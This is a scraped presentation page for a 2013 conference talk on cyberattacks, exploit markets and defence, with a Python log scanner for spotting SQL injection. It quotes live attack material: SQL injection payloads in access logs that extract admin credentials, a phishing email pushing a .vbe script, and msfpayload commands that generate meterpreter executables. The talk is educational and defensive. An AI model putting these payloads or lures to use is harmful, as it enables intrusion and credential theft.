Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
ATTACKS, LIES AND THE DIGITAL UNDERGROUND
Speaker: Andrea Pompili
There are only 10 types
of people in the world:
Those who understand binary,
and those who don't
> Cleanup and hardening carried out across the board one year earlier
> Operating systems patched to the latest available version
> Full logging of all the site's activity
> 2 IPS (Intrusion Prevention System) systems in cascade
Outside: 70%
Inside - Accidental: 12%
Inside - Malicious: 9%
Inside: 5%
Unknown: 4%
Source: http://datalossdb.org/ 2012 statistics
[Chart] Total attacks detected since 2007
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
[Chart] Impact of the detected attacks
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
«It is not the aim of this “focus” to report the survey results in detail, but by analysing the data on the average values for the whole sample, the results can be considered:
• satisfactory for logical protection;
• very satisfactory for infrastructure security;
• sufficient for the security of services;
• in need of improvement for organisational security.»
«We can say we expected it»
Aki Mon Telecom
Shane Atkinson
Canter & Siegel
Eddie Davidson
Peter Francis-Macrae
Davis Wolfgang Hawke
Jumpstart Technologies
Vandar Kushnir
Kevin Lipnitz
Wayne Mansfield
Oleg Nikolaenko
Alan Ralsky
Dave Rhodes
Scott Richter
Russian Business Network
iFrame Cash
SBT Telecom Network
Defcon Host
Micronnet Ltd.
InstallsCash
Sendar Argic
Richard Colbert
RBNet
Source: Panda Security «The Cyber-crime Black Market: Uncovered» - 2011
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
(*) According to Frank Rieger
Chief technology officer at GSMK
Source: Vincenzo Iozzo – OWASP Day 2012
So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox.
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin.
(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)
Blackhole Exploit Kit
Cool Exploit Kit
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
From: hdesk@rcs.it
Sent: Thursday, November 04, 2004 7:48 PM
To: xxxxxx@rcs.it
Subject: Configuration update
Hello,
you are receiving this e-mail because problems have been detected with your e-mail account. The cause of these problems lies in an incorrect configuration of your computer, which we ask you to update by connecting to the following address:
http://xxxx.rcs.it/software/av/index.html
Please run the auto-configuration script, Configurazione.vbe, whose link is available on the page indicated. When the configuration is complete, a message confirming the successful update will appear.
Best regards
Help Desk - RCS Technical Support
RCS Editori S.p.A. - Newspapers Division
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
Web Shell Extension
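Added example, not part of the talk: a small Python scanner that parses access-log lines like the ones above, strips the MySQL versioned-comment obfuscation (/*!select*/) that hides keywords from a signature looking for the bare word select, and flags the injection indicators per query parameter. The log lines, IP addresses and indicator names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx combined-log prefix: client IP, timestamp and the request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)"'
)

# MySQL executes the body of a /*!...*/ "versioned" comment, so /*!select*/
# is a working SELECT that a naive substring signature never sees.
VERSIONED_COMMENT = re.compile(r'/\*!\d*\s*(.*?)\s*\*/', re.S)
PLAIN_COMMENT = re.compile(r'/\*.*?\*/', re.S)

# Indicators checked against the normalised parameter value (names are hypothetical).
INDICATORS = {
    "order_by_probe": re.compile(r'\border\s+by\s+\d{3,}', re.I),
    "select_from": re.compile(r'\bselect\b.*\bfrom\b', re.I | re.S),
    "information_schema": re.compile(r'\binformation_schema\b', re.I),
    "error_based_dup_key": re.compile(r'floor\s*\(\s*rand\s*\(', re.I),
    "credential_columns": re.compile(r'\b(username|password)\b', re.I),
    "comment_terminator": re.compile(r'(--|#)\s*$'),
}


def normalize(value: str) -> str:
    """Undo the encodings layered on a parameter to slip past a signature."""
    # Decode twice: the web server decoded once, double encoding hides a second layer.
    for _ in range(2):
        value = unquote_plus(value)
    # /*!select*/ -> select ; /*!50000select*/ -> select
    value = VERSIONED_COMMENT.sub(r' \1 ', value)
    # Ordinary comments are used as whitespace substitutes: treat them as spaces.
    value = PLAIN_COMMENT.sub(' ', value)
    return re.sub(r'\s+', ' ', value).strip()


def analyze_request(target: str) -> dict:
    """Return {parameter: [indicator names]} for every suspicious query parameter."""
    findings = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        norm = normalize(raw)
        hits = [k for k, rx in INDICATORS.items() if rx.search(norm)]
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines) -> list:
    """Run the indicators over access-log lines and return one alert per hit."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m.group("target"))
        if findings:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), "findings": findings})
    return alerts


# Constructed sample log (documentation IPs), modelled on the requests shown above.
SAMPLE_LOG = [
    # Benign lookup: must not raise an alert.
    '192.0.2.10 - - [13/Nov/2012:20:01:02 +0100] '
    '"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1 HTTP/1.0" 200 512',
    # Column-count probe.
    '192.0.2.11 - - [13/Nov/2012:20:03:35 +0100] '
    '"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0" 500 0',
    # Error-based extraction with the keywords wrapped in versioned comments.
    '192.0.2.12 - - [13/Nov/2012:20:03:43 +0100] '
    '"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/'
    '(/*!select*/+count(*),concat_ws(0x3a,user(),floor(rand(0)*2))x+/*!from*/'
    '+/*!information_schema*/.tables+group+by+x)a)+--+ HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["ts"], alert["findings"])
```

The benign line produces no alert, the probe is flagged on the ORDER BY indicator alone, and the obfuscated request is flagged only because the versioned comments were unwrapped first.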
http://evader.stonesoft.com/
http://insecure.org/stf/secnet_ids/secnet_ids.html
msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
“The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
<#1> Think like an attacker, so that you understand what they will do and how they will attack you
<#2> Try to understand their objectives and their capabilities, but above all their operational constraints
<#3> Identify the «perceived» value of what you want to defend, and above all what you want to defend
<#4> Work on the entire defence perimeter, without leaps of faith
<#5> If your defence is cheaper than the attack, you will always be ahead
Domande?
Italian
‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬
Arabic
¿Preguntas?
Spanish
Questions?
English
tupoQghachmey
Klingon
Sindarin
Japanese
Ερωτήσεις?
Greek
вопросы?
Russian

Más contenido relacionado

Similar a Attacchi, bugie e underground digitale by Andrea Pompili

Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
VMware Tanzu
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
VMware Tanzu
 

Similar a Attacchi, bugie e underground digitale by Andrea Pompili (20)

Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Pompili - The miracle of sprite multiplication (C64)
Pompili -  The miracle of sprite multiplication (C64)Pompili -  The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymore
 
Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
 
Better Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinBetter Than BASH: Scripting Kotlin
Better Than BASH: Scripting Kotlin
 
PCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaPCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and Grafana
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Superhelt 2013-screen
Superhelt 2013-screenSuperhelt 2013-screen
Superhelt 2013-screen
 

Más de Codemotion

Más de Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

Último

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Último (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 

Attacchi, bugie e underground digitale by Andrea Pompili

  • 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com ATTACCHI, BUGIE E UNDERGROUND DIGITALE Speaker: Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't
  • 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com « » > Bonifica e Hardening fatta a tappeto un anno prima > Sistemi Operativi Patched all’ultima versione disponibile > Logging integrale di tutte le attività del Sito > 2 Sistemi IPS (Intrusion Prevention System) in cascata
  • 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Outside 70% Inside - Accidental 12% Inside - Malicious 9% Inside 5% Unknown 4% Source: http://datalossdb.org/ Statistiche 2012
  • 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 7,20% 6,20% 6,10% 5,70% 6,80% 6,80% 29,90% 41,20% 27,20% 34,10% 34,10% 30,70% 62,90% 52,60% 66,70% 60,20% 59,10% 62,50% Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  • 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 76,00% 3,80% 16,80% 3,40% 76,00% 6,50% 13,70% 3,80% 76,40% 6,70% 13,70% 3,20% Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  • 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com «Non è obiettivo di questo “focus” riportare in dettaglio i risultati della rilevazione ma analizzando i dati relativi ai valori medi per l’intero campione si può ritenere che i risultati siano: • soddisfacenti per la protezione logica; • molto soddisfacenti per la sicurezza dell’infrastruttura; • sufficienti per la sicurezza dei servizi; • da migliorare per la sicurezza dell’organizzazione. «Possiamo dire che ce l’aspettavamo»
  • 11. Aki Mon Telecom, Shane Atkinson, Canter & Siegel, Eddie Davidson, Peter Francis-Macrae, Davis Wolfgang Hawke, Jumpstart Technologies, Vandar Kushnir, Kevin Lipnitz, Wayne Mansfield, Oleg Nikolaenko, Alan Ralsky, Dave Rhodes, Scott Richter, Russian Business Network, iFrame Cash, SBT Telecom Network, Defcon Host, Micronnet Ltd., InstallsCash, Sendar Argic, Richard Colbert
    RBNet
    Source: Panda Security «The Cyber-crime Black Market: Uncovered» - 2011
  • 12. http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  • 14. (*) According to Frank Rieger, Chief Technology Officer at GSMK
  • 15. Source: Vincenzo Iozzo – OWASP Day 2012
  • 16. Source: Vincenzo Iozzo – OWASP Day 2012
  • 17. So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie's exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox. (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
    Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)
  • 18. Blackhole Exploit Kit
    Cool Exploit Kit
  • 19. http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 23. From: hdesk@rcs.it
    Sent: Thursday, November 04, 2004 7:48 PM
    To: xxxxxx@rcs.it
    Subject: Configuration update
    Hello, you are receiving this email because problems have been detected with your email account. The cause of these problems lies in an incorrect configuration of your computer, which we ask you to update by connecting to the following address: http://xxxx.rcs.it/software/av/index.html
    Please run the auto-configuration script, Configurazione.vbe, whose link is available on the page indicated. At the end of the configuration a message will appear confirming that the update completed successfully.
    Best regards,
    Help Desk - Technical Support RCS
    RCS Editori S.p.A. - Newspapers Division
  • 27. 173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
    178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"
  • 28. 89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
    Web Shell Extension
  • 29. http://evader.stonesoft.com/
    http://insecure.org/stf/secnet_ids/secnet_ids.html
  • 31. msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
  • 32. msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
  • 33. "The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose"
  • 34. <#1> Think like an attacker, so that you understand what they will do and how they will attack you
